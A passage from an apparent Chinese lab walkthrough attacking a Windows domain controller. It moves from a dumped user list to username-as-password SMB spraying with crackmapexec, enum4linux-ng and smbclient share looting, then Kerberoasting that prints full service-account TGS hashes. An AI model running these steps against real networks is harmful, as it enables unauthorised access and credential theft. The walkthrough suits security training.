1920: SOUPEDECODE\afiona845 (SidTypeUser)
1921: SOUPEDECODE\qcharlie846 (SidTypeUser)
1922: SOUPEDECODE\vliam847 (SidTypeUser)
1923: SOUPEDECODE\gopal849 (SidTypeUser)
1924: SOUPEDECODE\lwyatt850 (SidTypeUser)
1925: SOUPEDECODE\wfaith851 (SidTypeUser)
1926: SOUPEDECODE\qyara852 (SidTypeUser)
1927: SOUPEDECODE\rolivia853 (SidTypeUser)
1928: SOUPEDECODE\mbob854 (SidTypeUser)
1929: SOUPEDECODE\iwendy855 (SidTypeUser)
1930: SOUPEDECODE\nvera856 (SidTypeUser)
1931: SOUPEDECODE\faiden857 (SidTypeUser)
1932: SOUPEDECODE\keva858 (SidTypeUser)
1933: SOUPEDECODE\osteve859 (SidTypeUser)
1934: SOUPEDECODE\oyvonne860 (SidTypeUser)
1935: SOUPEDECODE\tdaisy861 (SidTypeUser)
1936: SOUPEDECODE\lcharlie862 (SidTypeUser)
1937: SOUPEDECODE\dcody863 (SidTypeUser)
1938: SOUPEDECODE\ijack864 (SidTypeUser)
1939: SOUPEDECODE\qfaith865 (SidTypeUser)
1940: SOUPEDECODE\rsam866 (SidTypeUser)
1941: SOUPEDECODE\tvictor867 (SidTypeUser)
1942: SOUPEDECODE\duma868 (SidTypeUser)
1943: SOUPEDECODE\hopal869 (SidTypeUser)
1944: SOUPEDECODE\gisaac870 (SidTypeUser)
1945: SOUPEDECODE\peli871 (SidTypeUser)
1946: SOUPEDECODE\ieva872 (SidTypeUser)
1947: SOUPEDECODE\omegan874 (SidTypeUser)
1948: SOUPEDECODE\hbeth875 (SidTypeUser)
1949: SOUPEDECODE\plaura876 (SidTypeUser)
1950: SOUPEDECODE\bkate877 (SidTypeUser)
1951: SOUPEDECODE\gsophie879 (SidTypeUser)
1952: SOUPEDECODE\moscar880 (SidTypeUser)
1953: SOUPEDECODE\kbeth881 (SidTypeUser)
1954: SOUPEDECODE\zmegan882 (SidTypeUser)
1955: SOUPEDECODE\dgloria883 (SidTypeUser)
1956: SOUPEDECODE\kzara884 (SidTypeUser)
1957: SOUPEDECODE\feli885 (SidTypeUser)
1958: SOUPEDECODE\hvictor886 (SidTypeUser)
1959: SOUPEDECODE\ecody887 (SidTypeUser)
1960: SOUPEDECODE\fyara888 (SidTypeUser)
1961: SOUPEDECODE\mdaisy889 (SidTypeUser)
1962: SOUPEDECODE\bursula890 (SidTypeUser)
1963: SOUPEDECODE\cdavid891 (SidTypeUser)
1964: SOUPEDECODE\lharper892 (SidTypeUser)
1965: SOUPEDECODE\khannah893 (SidTypeUser)
1966: SOUPEDECODE\tquincy894 (SidTypeUser)
1967: SOUPEDECODE\spaul895 (SidTypeUser)
1968: SOUPEDECODE\iuma896 (SidTypeUser)
1969: SOUPEDECODE\sxenia897 (SidTypeUser)
1970: SOUPEDECODE\ddavid898 (SidTypeUser)
1971: SOUPEDECODE\bliam899 (SidTypeUser)
1972: SOUPEDECODE\wcolin900 (SidTypeUser)
1973: SOUPEDECODE\lvictor901 (SidTypeUser)
1974: SOUPEDECODE\zwendy902 (SidTypeUser)
1975: SOUPEDECODE\ceric903 (SidTypeUser)
1976: SOUPEDECODE\jxenia904 (SidTypeUser)
1977: SOUPEDECODE\ohenry905 (SidTypeUser)
1978: SOUPEDECODE\ehelen906 (SidTypeUser)
1979: SOUPEDECODE\cnora907 (SidTypeUser)
1980: SOUPEDECODE\wtina908 (SidTypeUser)
1981: SOUPEDECODE\stina909 (SidTypeUser)
1982: SOUPEDECODE\ereed910 (SidTypeUser)
1983: SOUPEDECODE\qvictor911 (SidTypeUser)
1984: SOUPEDECODE\apaul912 (SidTypeUser)
1985: SOUPEDECODE\ccharlie913 (SidTypeUser)
1986: SOUPEDECODE\gnoah914 (SidTypeUser)
1987: SOUPEDECODE\uyvonne915 (SidTypeUser)
1988: SOUPEDECODE\dfiona916 (SidTypeUser)
1989: SOUPEDECODE\xtom918 (SidTypeUser)
1990: SOUPEDECODE\agloria919 (SidTypeUser)
1991: SOUPEDECODE\urose920 (SidTypeUser)
1992: SOUPEDECODE\lzach922 (SidTypeUser)
1993: SOUPEDECODE\xkylie923 (SidTypeUser)
1994: SOUPEDECODE\mquinton924 (SidTypeUser)
1995: SOUPEDECODE\lfiona925 (SidTypeUser)
1996: SOUPEDECODE\yfrank928 (SidTypeUser)
1997: SOUPEDECODE\vkevin929 (SidTypeUser)
1998: SOUPEDECODE\iyusuf930 (SidTypeUser)
1999: SOUPEDECODE\ifrank931 (SidTypeUser)
2000: SOUPEDECODE\pyara932 (SidTypeUser)
2001: SOUPEDECODE\bolivia933 (SidTypeUser)
2002: SOUPEDECODE\tgrace934 (SidTypeUser)
2003: SOUPEDECODE\orose935 (SidTypeUser)
2004: SOUPEDECODE\hzach936 (SidTypeUser)
2005: SOUPEDECODE\folivia937 (SidTypeUser)
2006: SOUPEDECODE\mbob938 (SidTypeUser)
2007: SOUPEDECODE\kaiden939 (SidTypeUser)
2008: SOUPEDECODE\rtara940 (SidTypeUser)
2009: SOUPEDECODE\vquincy941 (SidTypeUser)
2010: SOUPEDECODE\mnora942 (SidTypeUser)
2011: SOUPEDECODE\fwyatt943 (SidTypeUser)
2012: SOUPEDECODE\ryvonne944 (SidTypeUser)
2013: SOUPEDECODE\uquincy945 (SidTypeUser)
2014: SOUPEDECODE\avera946 (SidTypeUser)
2015: SOUPEDECODE\xbella947 (SidTypeUser)
2016: SOUPEDECODE\brose948 (SidTypeUser)
2017: SOUPEDECODE\oquinton949 (SidTypeUser)
2018: SOUPEDECODE\iuma950 (SidTypeUser)
2019: SOUPEDECODE\squincy951 (SidTypeUser)
2020: SOUPEDECODE\qursula952 (SidTypeUser)
2021: SOUPEDECODE\akevin953 (SidTypeUser)
2022: SOUPEDECODE\yquinn954 (SidTypeUser)
2023: SOUPEDECODE\padam955 (SidTypeUser)
2024: SOUPEDECODE\pgrace956 (SidTypeUser)
2025: SOUPEDECODE\egloria957 (SidTypeUser)
2026: SOUPEDECODE\asean958 (SidTypeUser)
2027: SOUPEDECODE\zmegan959 (SidTypeUser)
2028: SOUPEDECODE\syusuf960 (SidTypeUser)
2029: SOUPEDECODE\tfaith961 (SidTypeUser)
2030: SOUPEDECODE\nquinn962 (SidTypeUser)
2031: SOUPEDECODE\ijohn963 (SidTypeUser)
2032: SOUPEDECODE\reva964 (SidTypeUser)
2033: SOUPEDECODE\kethan965 (SidTypeUser)
2034: SOUPEDECODE\slaura966 (SidTypeUser)
2035: SOUPEDECODE\solivia967 (SidTypeUser)
2036: SOUPEDECODE\ijake968 (SidTypeUser)
2037: SOUPEDECODE\mmark969 (SidTypeUser)
2038: SOUPEDECODE\vfiona970 (SidTypeUser)
2039: SOUPEDECODE\fhannah971 (SidTypeUser)
2040: SOUPEDECODE\rrachel972 (SidTypeUser)
2041: SOUPEDECODE\aoliver973 (SidTypeUser)
2042: SOUPEDECODE\talice974 (SidTypeUser)
2043: SOUPEDECODE\irita976 (SidTypeUser)
2044: SOUPEDECODE\njudy977 (SidTypeUser)
2045: SOUPEDECODE\rtina979 (SidTypeUser)
2046: SOUPEDECODE\ivictor980 (SidTypeUser)
2047: SOUPEDECODE\sisaac981 (SidTypeUser)
2048: SOUPEDECODE\yoliver982 (SidTypeUser)
2049: SOUPEDECODE\dbella983 (SidTypeUser)
2050: SOUPEDECODE\vdaisy984 (SidTypeUser)
2051: SOUPEDECODE\jethan986 (SidTypeUser)
2052: SOUPEDECODE\ojake987 (SidTypeUser)
2053: SOUPEDECODE\tgrace989 (SidTypeUser)
2054: SOUPEDECODE\uquinn990 (SidTypeUser)
2055: SOUPEDECODE\xursula991 (SidTypeUser)
2056: SOUPEDECODE\ojudy992 (SidTypeUser)
2057: SOUPEDECODE\lhelen993 (SidTypeUser)
2058: SOUPEDECODE\cbianca994 (SidTypeUser)
2059: SOUPEDECODE\hbella995 (SidTypeUser)
2060: SOUPEDECODE\llila996 (SidTypeUser)
2061: SOUPEDECODE\fgloria997 (SidTypeUser)
2062: SOUPEDECODE\fjudy998 (SidTypeUser)
2063: SOUPEDECODE\WebServer$ (SidTypeUser)
2064: SOUPEDECODE\DatabaseServer$ (SidTypeUser)
2065: SOUPEDECODE\FileServer$ (SidTypeUser)
2066: SOUPEDECODE\MailServer$ (SidTypeUser)
2067: SOUPEDECODE\BackupServer$ (SidTypeUser)
2068: SOUPEDECODE\ApplicationServer$ (SidTypeUser)
2069: SOUPEDECODE\PrintServer$ (SidTypeUser)
2070: SOUPEDECODE\ProxyServer$ (SidTypeUser)
2071: SOUPEDECODE\MonitoringServer$ (SidTypeUser)
2072: SOUPEDECODE\CitrixServer$ (SidTypeUser)
2073: SOUPEDECODE\PC-1$ (SidTypeUser)
2074: SOUPEDECODE\PC-2$ (SidTypeUser)
2075: SOUPEDECODE\PC-3$ (SidTypeUser)
2076: SOUPEDECODE\PC-4$ (SidTypeUser)
2077: SOUPEDECODE\PC-5$ (SidTypeUser)
2078: SOUPEDECODE\PC-6$ (SidTypeUser)
2079: SOUPEDECODE\PC-7$ (SidTypeUser)
2080: SOUPEDECODE\PC-8$ (SidTypeUser)
2081: SOUPEDECODE\PC-9$ (SidTypeUser)
2082: SOUPEDECODE\PC-10$ (SidTypeUser)
2083: SOUPEDECODE\PC-11$ (SidTypeUser)
2084: SOUPEDECODE\PC-12$ (SidTypeUser)
2085: SOUPEDECODE\PC-13$ (SidTypeUser)
2086: SOUPEDECODE\PC-14$ (SidTypeUser)
2087: SOUPEDECODE\PC-15$ (SidTypeUser)
2088: SOUPEDECODE\PC-16$ (SidTypeUser)
2089: SOUPEDECODE\PC-17$ (SidTypeUser)
2090: SOUPEDECODE\PC-18$ (SidTypeUser)
2091: SOUPEDECODE\PC-19$ (SidTypeUser)
2092: SOUPEDECODE\PC-20$ (SidTypeUser)
2093: SOUPEDECODE\PC-21$ (SidTypeUser)
2094: SOUPEDECODE\PC-22$ (SidTypeUser)
2095: SOUPEDECODE\PC-23$ (SidTypeUser)
2096: SOUPEDECODE\PC-24$ (SidTypeUser)
2097: SOUPEDECODE\PC-25$ (SidTypeUser)
2098: SOUPEDECODE\PC-26$ (SidTypeUser)
2099: SOUPEDECODE\PC-27$ (SidTypeUser)
2100: SOUPEDECODE\PC-28$ (SidTypeUser)
2101: SOUPEDECODE\PC-29$ (SidTypeUser)
2102: SOUPEDECODE\PC-30$ (SidTypeUser)
2103: SOUPEDECODE\PC-31$ (SidTypeUser)
2104: SOUPEDECODE\PC-32$ (SidTypeUser)
2105: SOUPEDECODE\PC-33$ (SidTypeUser)
2106: SOUPEDECODE\PC-34$ (SidTypeUser)
2107: SOUPEDECODE\PC-35$ (SidTypeUser)
2108: SOUPEDECODE\PC-36$ (SidTypeUser)
2109: SOUPEDECODE\PC-37$ (SidTypeUser)
2110: SOUPEDECODE\PC-38$ (SidTypeUser)
2111: SOUPEDECODE\PC-39$ (SidTypeUser)
2112: SOUPEDECODE\PC-40$ (SidTypeUser)
2113: SOUPEDECODE\PC-41$ (SidTypeUser)
2114: SOUPEDECODE\PC-42$ (SidTypeUser)
2115: SOUPEDECODE\PC-43$ (SidTypeUser)
2116: SOUPEDECODE\PC-44$ (SidTypeUser)
2117: SOUPEDECODE\PC-45$ (SidTypeUser)
2118: SOUPEDECODE\PC-46$ (SidTypeUser)
2119: SOUPEDECODE\PC-47$ (SidTypeUser)
2120: SOUPEDECODE\PC-48$ (SidTypeUser)
2121: SOUPEDECODE\PC-49$ (SidTypeUser)
2122: SOUPEDECODE\PC-50$ (SidTypeUser)
2123: SOUPEDECODE\PC-51$ (SidTypeUser)
2124: SOUPEDECODE\PC-52$ (SidTypeUser)
2125: SOUPEDECODE\PC-53$ (SidTypeUser)
2126: SOUPEDECODE\PC-54$ (SidTypeUser)
2127: SOUPEDECODE\PC-55$ (SidTypeUser)
2128: SOUPEDECODE\PC-56$ (SidTypeUser)
2129: SOUPEDECODE\PC-57$ (SidTypeUser)
2130: SOUPEDECODE\PC-58$ (SidTypeUser)
2131: SOUPEDECODE\PC-59$ (SidTypeUser)
2132: SOUPEDECODE\PC-60$ (SidTypeUser)
2133: SOUPEDECODE\PC-61$ (SidTypeUser)
2134: SOUPEDECODE\PC-62$ (SidTypeUser)
2135: SOUPEDECODE\PC-63$ (SidTypeUser)
2136: SOUPEDECODE\PC-64$ (SidTypeUser)
2137: SOUPEDECODE\PC-65$ (SidTypeUser)
2138: SOUPEDECODE\PC-66$ (SidTypeUser)
2139: SOUPEDECODE\PC-67$ (SidTypeUser)
2140: SOUPEDECODE\PC-68$ (SidTypeUser)
2141: SOUPEDECODE\PC-69$ (SidTypeUser)
2142: SOUPEDECODE\PC-70$ (SidTypeUser)
2143: SOUPEDECODE\PC-71$ (SidTypeUser)
2144: SOUPEDECODE\PC-72$ (SidTypeUser)
2145: SOUPEDECODE\PC-73$ (SidTypeUser)
2146: SOUPEDECODE\PC-74$ (SidTypeUser)
2147: SOUPEDECODE\PC-75$ (SidTypeUser)
2148: SOUPEDECODE\PC-76$ (SidTypeUser)
2149: SOUPEDECODE\PC-77$ (SidTypeUser)
2150: SOUPEDECODE\PC-78$ (SidTypeUser)
2151: SOUPEDECODE\PC-79$ (SidTypeUser)
2152: SOUPEDECODE\PC-80$ (SidTypeUser)
2153: SOUPEDECODE\PC-81$ (SidTypeUser)
2154: SOUPEDECODE\PC-82$ (SidTypeUser)
2155: SOUPEDECODE\PC-83$ (SidTypeUser)
2156: SOUPEDECODE\PC-84$ (SidTypeUser)
2157: SOUPEDECODE\PC-85$ (SidTypeUser)
2158: SOUPEDECODE\PC-86$ (SidTypeUser)
2159: SOUPEDECODE\PC-87$ (SidTypeUser)
2160: SOUPEDECODE\PC-88$ (SidTypeUser)
2161: SOUPEDECODE\PC-89$ (SidTypeUser)
2162: SOUPEDECODE\PC-90$ (SidTypeUser)
2163: SOUPEDECODE\firewall_svc (SidTypeUser)
2164: SOUPEDECODE\backup_svc (SidTypeUser)
2165: SOUPEDECODE\web_svc (SidTypeUser)
2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
用如下命令就能把用户剪出来了
cat users.txt | cut -f2 -d '\' | cut -f1 -d '(' | sed "s/ \n//g" > res.txt
smb爆破
得到用户名后,先将其作为字典去爆破smb
crackmapexec smb 192.168.56.128 -u ./users.txt -p ./users.txt --continue-on-success --no-bruteforce
得到账户ybob317:ybob317
用新用户再跑一遍enum4linux-ng
enum4linux-ng -A 192.168.56.128 -u "ybob317" -p "ybob317"
ENUM4LINUX - next generation (v1.3.3)
==========================
| Target Information |
==========================
[*] Target ........... 192.168.56.128
[*] Username ......... 'ybob317'
[*] Random Username .. 'eepqcjsw'
[*] Password ......... 'ybob317'
[*] Timeout .......... 5 second(s)
=======================================
| Listener Scan on 192.168.56.128 |
=======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
======================================================
| Domain Information via LDAP for 192.168.56.128 |
======================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: SOUPEDECODE.LOCAL
=============================================================
| NetBIOS Names and Workgroup/Domain for 192.168.56.128 |
=============================================================
[+] Got domain/workgroup name: SOUPEDECODE
[+] Full NetBIOS names information:
- DC01 <00> - B <ACTIVE> Workstation Service
- SOUPEDECODE <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
- SOUPEDECODE <1c> - <GROUP> B <ACTIVE> Domain Controllers
- DC01 <20> - B <ACTIVE> File Server Service
- SOUPEDECODE <1b> - B <ACTIVE> Domain Master Browser
- MAC Address = 08-00-27-D8-9E-16
===========================================
| SMB Dialect Check on 192.168.56.128 |
===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
=============================================================
| Domain Information via SMB session for 192.168.56.128 |
=============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: SOUPEDECODE
DNS domain: SOUPEDECODE.LOCAL
FQDN: DC01.SOUPEDECODE.LOCAL
Derived membership: domain member
Derived domain: SOUPEDECODE
===========================================
| RPC Session Check on 192.168.56.128 |
===========================================
[*] Check for null session
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for user session
[+] Server allows session using username 'ybob317', password 'ybob317'
[*] Check for random user
[+] Server allows session using username 'eepqcjsw', password 'ybob317'
[H] Rerunning enumeration with user 'eepqcjsw' might give more results
=====================================================
| Domain Information via RPC for 192.168.56.128 |
=====================================================
[+] Domain: SOUPEDECODE
[+] Domain SID: S-1-5-21-2986980474-46765180-2505414164
[+] Membership: domain member
=================================================
| OS Information via RPC for 192.168.56.128 |
=================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: ''
OS build: '20348'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x80102b'
Server type string: Wk Sv PDC Tim NT
=======================================
| Users via RPC on 192.168.56.128 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 967 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 967 user(s) via 'enumdomusers'
[+] After merging user results we have 967 user(s) total:
//这部分太长了,就不打印了,大概14000字
========================================
| Shares via RPC on 192.168.56.128 |
========================================
[*] Enumerating shares
[+] Found 7 share(s):
ADMIN$:
comment: Remote Admin
type: Disk
C$:
comment: Default share
type: Disk
IPC$:
comment: Remote IPC
type: IPC
NETLOGON:
comment: Logon server share
type: Disk
SYSVOL:
comment: Logon server share
type: Disk
Users:
comment: ''
type: Disk
backup:
comment: ''
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: OK
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: OK
[*] Testing share Users
[+] Mapping: OK, Listing: OK
[*] Testing share backup
[+] Mapping: OK, Listing: DENIED
===========================================
| Policies via RPC for 192.168.56.128 |
===========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: 41 days 23 hours 53 minutes
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
===========================================
| Printers via RPC for 192.168.56.128 |
===========================================
[+] No printers available
这里主要NETLOGON,SYSVOL,Users,backup四个文件夹可以访问了。直接用smbclient全部脱下来再说
smbclient \\\\192.168.56.128\\Users -U "ybob317%ybob317"
recurse ON #开启递归,开启后会以目录递归方式运行mget和mput命令
prompt OFF #关闭交互,开启后,下载文件时不再要求输入y/n确认
mget * #批量获取文件,*是一个调配符,递归遍历时,任何文件名符合通配符的文件都会下载下来,*可以匹配所有
同理把所有路径都拉下来。backup还暂时没有权限去访问,但不是问题。在USERS文件夹的ybob317用户目录中,我们找到了user.txt
6bab1f09a7403980bfeb4c2b412be47b
Kerberoasting 攻击
服务器上开启了kerberos服务,想办法通过SPN服务拿到服务用户hash。
这里使用的工具是
impacket-GetUserSPNs -request -dc-ip 192.168.56.128 SOUPEDECODE.LOCAL/ybob317:ybob317
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Clock skew too great报错是因为我们虚拟机和服务器的时间对不上。这个靶机每隔一段时间就会自行关机,恢复后自己还不校准,所以只能让我们自己去适应它了:
sudo rdate -n 192.168.56.128
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$b7fc23b3527e22d3c045a98fb41ab1eb$951a7e711b2e7a9da4daa1d98b96f1b760e7da46e5672c8518bc8467f692c121a6b863b59faddf86473ef636b9d51fbef2d52ad1cdb00f8de8d94fbf857ca2ded2e642bb6117e095a7e1a29f309d0f0694c8f99ffb2b7885238919bf7eeec89a3bba05570aef73587a7bef88f488c74675148ee2353f1f4fd0ca30d7a4818ac1b4ba3052c4f8d20b06d71535d116b596dc9accab9582cacdf7332d2d2f05ce250b6450212d59f59ddcbc841ff41fb108d1a68a0859008fe21686b4e04eb22db47575990b38ab41f02825755befb5e9535faa1ecaba2a6abe93989e11ab3c150f1471c29812073e843b402eb0cd9426807c34d569cf4d4337c2127efd349d86c70dbe206c6ceea581fc277ec7e55028ccc68594f06c1afbeb6ba0f914bc50fe802b926f8d7f6e30f870c0940662397686519d4356521faa717010c9c4bea6df109f2efb6d4830af0acb7ff3a87efa098f357ec5c28132251be12864ed3a4a53165559244119e4b56f318b99c9d10bfe46f328d19805399d0ebb9e6c6f9320580e2dd0aeabbd65b64e3cd6562d827fc9cef138ac4ac2b80b503aca701d9cce59ce1b75c5ece928830d8d7dd97e8cc9c7b8c0ece3ff3762ab6095bec56cddcd81bc57d4a4c01f3cb26280a33f1a507e8405b0086d4f63d85276768ff76a073c19c66b24dfac42cbf468ca3e2360009881d24d5cbe02d4be2df443ca02a959aeafbd2b0f763a21a1d355281a2110bc4e75ef8c4b91f2449b0c00ffc4d532beaac9bcf4123612efa2a9dad5b699a2705f4618aa8aba0c62420920a7fc7e9fe91e1d3bdba0591cff65e496ac95eb91f1f2962b61238311984b9e6d5e62d4880599964ce7fea14a9b5a02eb7b0925b9fb93f5d3b0c26ea4b92c61ac4785c0c4ff617012ec7900917ae06be6d219a07a2e004bbe575e4e79da1ababbd36706163c488c0f6047d8f80b83c2a7a048485a0012b2ea2238a15cd5b3a824e698a74a4c44f27a178175a4188e8b8ceb47e7d72d673f099990c0eff1adf7f09ba462b0939135ec523a314c778d8cdad709f0733a8b71eb8ff683f32f575595f2ea3abf1544fdf759041d8be00da3dad4f5960f45fe161ce24aa602273121b64e398d4bd17ae29948a73e78c33dc7b7aa4438a3a3a122e53b4617da26e85dd6d536929fda269f4415e60c431dcef43b45824d12148c8263ca6d162dd325518e2f826a143ea099f8d264b219bd72425405f5ab740fd7fa5e7915ee80f9a85cd80f4ea75870f51201d011a4ff173a084a87aa9860e8d4019366c3c0f9d744633044781a1b3ece1174e1b1f85c90727526fd1d9e47e478416a032e4f456a47ea07064970985c52c1f3bec6bf53edfe98d376de514878b71e12989b8e6c718f6903b0e268176cd435240f9e7dd9effab243065e723400315ab450082281d6bc15a653bdcaf5365da61aad285c238ab7fbbc3b3014bdd7b7404e8eab8ab6bfecaebcf2097a7b0a304b041f
$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/firewall_svc*$6ed54b6ba18af30576ca2c0cedfbfcd0$18a0856979b772d80369f30e8b9dbd5c15ee742b27ba3510546e8607b6eb393b2cf570ae1a7537511212bd06fdbd62428e418dc7266db7eec9179053201c076890c345b56d05f82add4bdececea9a5acbf18cb96aa5a380945ca14700e4e87d8e312d4b2397c2679acbf7a574a5cbc761977f8a280cb3265b47641cfe0ff9ad894ed3848d1917529f7cffcddc071dd9691543cf09c24d12c2831b1aa60f7234210893c0a20bc8468c452fd3de0150a28dba3a15a9768214efd0d4d93fc314af5c9708f1bc2872b7e5a32181f3d9e1089b0762532ead2a6aeeac8b3c749dda60e377e83aea3adf598cbcf5a38365885a48cf88f1cb4b3310f71071af599f4a802553410c2bc8e993912186c1f7d051446fba5f6f958abf099424a6a2787640c9a186e358b4e52d2a8bdba5552613ca8dbc9930b524cd3f25b84e0aa52a4b5ced52318812f879bf78c0e5fd73b90a883cb44f42f528f7086111a42881fed1320575afb052d1d3cabc7334ef24b7e5204040628f50b5de3e372668aeaad7714bcc12debc0bfd384047657da15d57bea91441a7d37899f4f52f6671bba5e1079c1068f87a7a4490a4b14650cc9095cdc1d77114dd0b3a6db104a3afaa02c86aae3589766d26254f849c10a4e073f9ab1f6b4ab83fd0384dc70eed0150321ca6a5978c2f3fae0cdaed679b40cef2866d3743fd34ef182f8c29fe9ec4fa7f8851c1ef357278e601333a3bdfa24ddd30d305f051e11217f6ed0d19c9a7c4811420028974532b68c7bf141aee12274343c320ad5b2297316d8949840de151202d20ff7e1f315ce196ec86f8f68040a919b7f5fc2fe0877a346d0bebcf9a6e4a64f2e8e48d2a486641b08caa6bc5e8a602f71ec01e03cdfac36f76de28c2f36785ea4c7ee35f3bb00f32d2bf32f69f65607ec2bda43871043b591662610a5f20ff869672004b1c50d777f2824edd83d637994976fefeb13356eb908584f9f45eeccd389f1807b8a4b59c1be9f87c5f78f563b6bb36a49d581ef2aeecef888cb1542497e92e753255605b0362e7c5b1742fdd6f213b25dd69778695a54258a9ccb63eb803d2a8de66b5310fa0001a90cdc752c519dcded9536e718bdbad18f416eb382bcab7640436ee1a9e9e2c9fdfd4d242c477463e733df2663b3ad372a1fe6d5e3f7cc3515c60afa46c2a263a2753adc614978c047e308ef48ead04bca0c64725f5abf4400795a9afea127dc911a90c5955e7bbe70ba9adea541a2e40831836741d1efe04b479906622a2d727e9037f8c1f9e3146826a11134e13cc46c588b2b6ff353ed9fa20b7782599b9c4970abfa74f91d530297e914145bd554d3bbcb07256843bed9445dc72bb17fea1d73ecff3681bb2a443ed7c8048af775111bfb87be8162214001c3ec5eed2bf77e53a127fc9a40795b1ed9c8f1823f32857541e536c8c7309978de6aabcfa2dbefe9d315502acd456bf3cf0b472cc395945796496a3cc77c
$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/backup_svc*$c5d2939a99cb604b19a818f68ac41f6a$95a794356f6945009be014708c62519c8b9dc222c539d60d7ab21ae71bd5048183bd009cb3c4e3422687637a58cf8561bffdac988c8008c885ba5d1ffb73f2c9731d1d6d0426dbad42282a0c6953aa08bc9f1edab3f6f6d5e04d53d356734c5b08f4a9450738630324f39322389e3a285fcff8ade9d415ccc0945b5bd43b4aaa0feb988606634809e34facffe252d3866a7e0c66793487a2f805d09544504d6736375db6b71533f4991e0b0d079978a0b8b38cf38e3ca3234342242889dfcfe5455989d947db095bdea792d41819bfe352b21be02392d2c51887f758561685b3e08084b592b9549a1eb3d82c7ccde3069b75c2969cc15aee0aa1fcf69f885c7077af1bf627dc92a645bdfb41bc574d61415bfc5b68bfac442068dea80e48325c89311b763466675357d2ec3c2be1d7191836301c219c92b988a9d42319be710be0ecbb5af6b49ca90a15c85ab1b69b4f1a03cc1e1bf9111a8f00882c8cbebb9b8bf0ba629d7aa1dc75eb37ecc1c34982a960eab8b876b1cb3f53f32c72c589df857dde3380c714bef4830b4a2a1369fa4ce6e35fa5c672ec55a8a5136390104a028d92362f6183356c5e2890016ae946d743ca4dba7438bf927ac7fc310344847136dbe5416a1049f59016705f3b78f8a4642b309f0e1736e230f9627b3b0bfa9e7ed4f962cd5d3ba746579318d05156ff6a976f4a91ccd5e7e23bc8a35d7e5d723c38b3426beb5c6841ac12e1b658fef2a48ec34edfd6bcf170f4ff0fcb552a72edba7d2d418f1470273da38de821fc1dd8685a1919e43fd224f9c7d46ca078c247502220e759dedcdcc59c8b51f914943298aa2aad97898178712617e362bff608ddab71588280327eca682daa93b50bc4ac610d7bd120839ebabd83f7cd96bd92dc570644fbcd26627ac1148c9cad1842d14ef2e38913e8a284058bfd920ebe029b03604d1b111b16021f2be9c8066f18add5f4ebcfbf70e92f8eaf6d634fa0433b518871e5198c3d05663da9988b3ed16c927f41c62028353584bb19230b1b30a342a1ad37a2a268cb2f643e44758aaf5bf5d7c8497b5e6a61cd68326bf937f8300be09fec2af80e5baf00a8a6da17d20b9228ebda327ee0e74644f94bf261df6e6247e18f2521c7d8feeec53601c2fab1f889f961000e05e76dbba841896846b6130a4e6661c596e653125b4c39485debaa4ce7f7bca876c692dfaaf831c9435cf7f88e28b90457b1d35ee5bc198d0446934d6216df24fa39d6245413e796200b3717d47cf3f6c8304d7adb15a